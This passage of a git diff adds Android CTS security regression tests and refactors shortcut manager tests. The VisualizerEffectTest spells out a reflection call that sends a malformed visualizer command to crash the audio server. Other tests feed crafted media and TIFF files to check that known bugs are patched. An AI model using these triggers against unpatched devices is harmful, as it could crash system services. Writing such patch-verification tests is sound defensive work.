+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+
+ LooperThread thr = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ AssetFileDescriptor fd = null;
+ try {
+ fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(R.raw.good);
+
+ // the onErrorListener won't receive MEDIA_ERROR_SERVER_DIED until
+ // setDataSource has been called
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ fd.close();
+ } catch (Exception e) {
+ // this is a known-good file, so no failure should occur
+ fail("setDataSource of known-good file failed");
+ }
+
+ synchronized(mpcl) {
+ mpcl.notify();
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ thr.start();
+ // wait until the thread has initialized the MediaPlayer
+ synchronized(mpcl) {
+ mpcl.wait();
+ }
+
+ Resources resources = getInstrumentation().getContext().getResources();
+ MediaMetadataRetriever retriever = new MediaMetadataRetriever();
+ if (url == null) {
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ retriever.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IllegalArgumentException e) {
+ // ignore
+ } finally {
+ closeQuietly(fd);
+ }
+ } else {
+ retriever.setDataSource(url, new HashMap<String, String>());
+ }
+ retriever.extractMetadata(MediaMetadataRetriever.METADATA_KEY_DURATION);
+ retriever.getEmbeddedPicture();
+ retriever.getFrameAtTime();
+
+ retriever.release();
+ String rname = url != null ? url : resources.getResourceEntryName(rid);
+ String cve = rname.replace("_", "-").toUpperCase();
+ assertFalse("Device *IS* vulnerable to " + cve,
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ thr.stopLooper();
+ thr.join();
}
}
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
new file mode 100644
index 0000000..807412b
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import junit.framework.TestCase;
+
+import android.content.Context;
+import android.platform.test.annotations.SecurityTest;
+import android.media.audiofx.AudioEffect;
+import android.media.MediaPlayer;
+import android.media.audiofx.Visualizer;
+import android.test.AndroidTestCase;
+import android.test.InstrumentationTestCase;
+import android.util.Log;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Method;
+import java.util.UUID;
+
+public class VisualizerEffectTest extends InstrumentationTestCase {
+ private String TAG = "VisualizerEffectTest";
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ //Testing security bug: 30229821
+ @SecurityTest
+ public void testVisualizer_MalformedConstructor() throws Exception {
+ final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ final int VISUALIZER_CMD_MEASURE = 0x10001;
+
+ AudioEffect.Descriptor[] descriptors = AudioEffect.queryEffects();
+ int i, visualizerIndex = -1;
+ for (i = 0; i < descriptors.length; ++i) {
+ AudioEffect.Descriptor descriptor = descriptors[i];
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) == 0) {
+ visualizerIndex = i;
+
+ AudioEffect ae = null;
+ MediaPlayer mp = null;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), R.raw.good);
+ Constructor ct = AudioEffect.class.getConstructor(UUID.class, UUID.class,
+ int.class, int.class);
+ ae = (AudioEffect) ct.newInstance(descriptors[visualizerIndex].type,
+ descriptors[visualizerIndex].uuid, 0, mp.getAudioSessionId());
+ Method command = AudioEffect.class.getDeclaredMethod("command", int.class,
+ byte[].class, byte[].class);
+ Integer ret = (Integer) command.invoke(ae, new Object[]{VISUALIZER_CMD_MEASURE,
+ new byte[0], new byte[0]});
+ assertTrue("Audio server might have crashed", ret != -7);
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing visualizer");
+ } finally {
+ if (ae != null) {
+ ae.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ }
+ }
+
+ if (visualizerIndex == -1) {
+ Log.w(TAG,"No visualizer found to test");
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
new file mode 100644
index 0000000..bbc70a9
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class ZeroHeightTiffTest extends AndroidTestCase {
+ /**
+ * Verifies that the device fails to decode a zero height tiff file.
+ *
+ * Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
+ * With the fix, decoding will fail, without dividing by zero.
+ */
+ @SecurityTest
+ public void test_android_bug_33300701() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ assertNull(bitmap);
+ }
+}
diff --git a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java
index 61f94d4..fdedc45 100644
--- a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java
+++ b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutLaunchedActivity.java
@@ -22,7 +22,9 @@
import android.util.Log;
import java.util.ArrayList;
+import java.util.Arrays;
import java.util.List;
+import java.util.Objects;
import java.util.concurrent.atomic.AtomicInteger;
/**
@@ -36,9 +38,14 @@
private final int mInstanceId = sNextInstanceId.getAndIncrement();
- // @GuardedBy("sReceivedIntents")
+ private static final Object sLock = new Object();
+
+ // @GuardedBy("sLock")
private static final ArrayList<Intent> sReceivedIntents = new ArrayList<>();
+ // @GuardedBy("sLock")
+ private static final ArrayList<String> sExpectedVisibleOrder = new ArrayList<>();
+
private Handler mHandler = new Handler();
private Intent mIntentToAdd;
@@ -48,6 +55,10 @@
mInstanceId, action, getIntent()));
}
+ public ShortcutLaunchedActivity() {
+ log("ctor");
+ }
+
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
@@ -63,22 +74,27 @@
log("onResume");
- synchronized (sReceivedIntents) {
+ synchronized (sLock) {
+ if (!Objects.equals(getIntent().getAction(), sExpectedVisibleOrder.get(0))) {
+ log("Not my turn yet.");
+ return;
+ }
+ sExpectedVisibleOrder.remove(0);
+
// Make sure we only add it once, ever.
if (mIntentToAdd != null) {
sReceivedIntents.add(new Intent(getIntent()));
mIntentToAdd = null;
}
}
- mHandler.post(() -> {
- onBackPressed();
- });
+ finish();
}
@Override
- public void onBackPressed() {
- log("onBackPressed");
- super.onBackPressed();
+ protected void onPause() {
+ log("onPause");
+
+ super.onPause();
}
@Override
@@ -88,14 +104,17 @@
super.onDestroy();
}
- public static void clearIntents() {
- synchronized (sReceivedIntents) {
+ public static void setExpectedOrder(String[] actions) {
+ synchronized (sLock) {
sReceivedIntents.clear();
+
+ sExpectedVisibleOrder.clear();
+ sExpectedVisibleOrder.addAll(Arrays.asList(actions));
}
}
public static List<Intent> getIntents() {
- synchronized (sReceivedIntents) {
+ synchronized (sLock) {
return new ArrayList(sReceivedIntents);
}
}
diff --git a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java
index e80b66e..9cf1f89 100644
--- a/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java
+++ b/tests/tests/shortcutmanager/src/android/content/pm/cts/shortcutmanager/ShortcutManagerStartShortcutTest.java
@@ -20,7 +20,6 @@
import static com.android.server.pm.shortcutmanagertest.ShortcutManagerTestUtils.retryUntil;
import static com.android.server.pm.shortcutmanagertest.ShortcutManagerTestUtils.setDefaultLauncher;
-import android.app.ActivityOptions;
import android.content.ActivityNotFoundException;
import android.content.ComponentName;
import android.content.Context;
@@ -29,8 +28,6 @@
import android.os.Bundle;
import android.test.suitebuilder.annotation.SmallTest;
-import org.junit.internal.runners.statements.ExpectException;
-
import java.util.List;
@SmallTest
@@ -45,14 +42,16 @@
}
private List<Intent> launchShortcutAndGetIntents(Context launcher, Context client,
- String id, int expectedNumIntents) {
- return launchShortcutAndGetIntents(launcher, client, id, expectedNumIntents, null, null);
+ String id, int expectedNumIntents, String[] expectedActions) {
+ return launchShortcutAndGetIntents(launcher, client, id, expectedNumIntents, null, null,
+ expectedActions);
}
private List<Intent> launchShortcutAndGetIntents(Context launcher, Context client,
- String id, int expectedNumIntents, Rect rect, Bundle options) {
+ String id, int expectedNumIntents, Rect rect, Bundle options,
+ String[] expectedActions) {
- ShortcutLaunchedActivity.clearIntents();
+ ShortcutLaunchedActivity.setExpectedOrder(expectedActions);
runWithCaller(launcher, () -> {
getLauncherApps().startShortcut(client.getPackageName(), id, rect, options,
@@ -65,8 +64,10 @@
return ShortcutLaunchedActivity.getIntents();
}
- private void assertShortcutStarts(Context launcher, Context client, String id) {
- final List<Intent> launched = launchShortcutAndGetIntents(launcher, client, id, 1);
+ private void assertShortcutStarts(Context launcher, Context client, String id,
+ String[] expectedActions) {
+ final List<Intent> launched = launchShortcutAndGetIntents(launcher, client, id, 1,
+ expectedActions);
assertTrue(launched.size() > 0);
}
@@ -81,6 +82,9 @@
});
}
+ private static final String[] EXPECTED_ACTIONS_SINGLE = new String[]{Intent.ACTION_MAIN};
+ private static final String[] EXPECTED_ACTIONS_MULTI = new String[]{"a3", "a2", "a1"};
+
/**
* Start a single activity.
*/
@@ -100,7 +104,7 @@
});
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1);
+ "s1", 1, EXPECTED_ACTIONS_SINGLE);
assertEquals(1, launched.size());
assertEquals(Intent.ACTION_MAIN, launched.get(0).getAction());
assertTrue((launched.get(0).getFlags() & Intent.FLAG_ACTIVITY_NO_ANIMATION) != 0);
@@ -132,7 +136,7 @@
});
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 3);
+ "s1", 3, EXPECTED_ACTIONS_MULTI);
assertEquals(3, launched.size());
Intent i = launched.get(2);
@@ -164,7 +168,8 @@
setDefaultLauncher(getInstrumentation(), mLauncherContext2);
// L2 can start it.
- assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1",
+ EXPECTED_ACTIONS_SINGLE);
// L1 no longer can start it.
assertShortcutCantStart(mLauncherContext1, mPackageContext1, "s1",
@@ -225,7 +230,7 @@
});
// Should still be launchable.
- assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1", EXPECTED_ACTIONS_SINGLE);
}
public void testPinnedShortcut_differentLauncher() {
@@ -249,7 +254,7 @@
setDefaultLauncher(getInstrumentation(), mLauncherContext2);
// L2 can now launch it.
- assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext2, mPackageContext1, "s1", EXPECTED_ACTIONS_SINGLE);
// Then remove it.
runWithCaller(mPackageContext1, () -> {
@@ -261,14 +266,14 @@
ActivityNotFoundException.class);
// But launcher 1 can still launch it too, because it's pinned by this launcher.
- assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1");
+ assertShortcutStarts(mLauncherContext1, mPackageContext1, "s1", EXPECTED_ACTIONS_SINGLE);
}
public void testStartSingleWithOptions() {
testStartSingle();
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1, new Rect(1, 1, 2, 2), new Bundle());
+ "s1", 1, new Rect(1, 1, 2, 2), new Bundle(), EXPECTED_ACTIONS_SINGLE);
Intent i = launched.get(0);
assertEquals(1, i.getSourceBounds().left);
@@ -280,7 +285,7 @@
testStartMultiple();
List<Intent> launched = launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 3, new Rect(1, 1, 2, 2), new Bundle());
+ "s1", 3, new Rect(1, 1, 2, 2), new Bundle(), EXPECTED_ACTIONS_MULTI);
Intent i = launched.get(2);
assertEquals(1, i.getSourceBounds().left);
@@ -309,7 +314,7 @@
assertExpectException(
ActivityNotFoundException.class, "Shortcut could not be started", () -> {
launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1);
+ "s1", 1, new String[0]);
});
}
@@ -334,7 +339,7 @@
assertExpectException(
ActivityNotFoundException.class, "Shortcut could not be started", () -> {
launchShortcutAndGetIntents(mLauncherContext1, mPackageContext1,
- "s1", 1);
+ "s1", 1, new String[0]);
});
}
}
diff --git a/tools/cts-tradefed/Android.mk b/tools/cts-tradefed/Android.mk
index b535fce..1b7aacd 100644
--- a/tools/cts-tradefed/Android.mk
+++ b/tools/cts-tradefed/Android.mk
@@ -25,7 +25,7 @@
LOCAL_SUITE_TARGET_ARCH := $(TARGET_ARCH)
LOCAL_SUITE_NAME := CTS
LOCAL_SUITE_FULLNAME := "Compatibility Test Suite"
-LOCAL_SUITE_VERSION := 7.1_r3
+LOCAL_SUITE_VERSION := 7.1_r201704s
LOCAL_MODULE := cts-tradefed
diff --git a/tools/cts-tradefed/res/config/cts-sts.xml b/tools/cts-tradefed/res/config/cts-sts.xml
new file mode 100644
index 0000000..8e4c030
--- /dev/null
+++ b/tools/cts-tradefed/res/config/cts-sts.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Runs Security Patch test cases">
+
+ <option name="plan" value="cts-sts" />
+
+ <include name="cts"/>
+
+ <option name="compatibility:include-filter" value="CtsSecurityTestCases" />
+
+ <option name="compatibility:include-filter" value="CtsSecurityHostTestCases" />
+
+ <!-- Only run tests with @SecurityTest annotation. -->
+ <option name="compatibility:module-arg" value="CtsSecurityHostTestCases:include-annotation:android.platform.test.annotations.SecurityTest"/>
+
+ <option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:include-annotation:android.platform.test.annotations.SecurityTest" />
+
+</configuration>
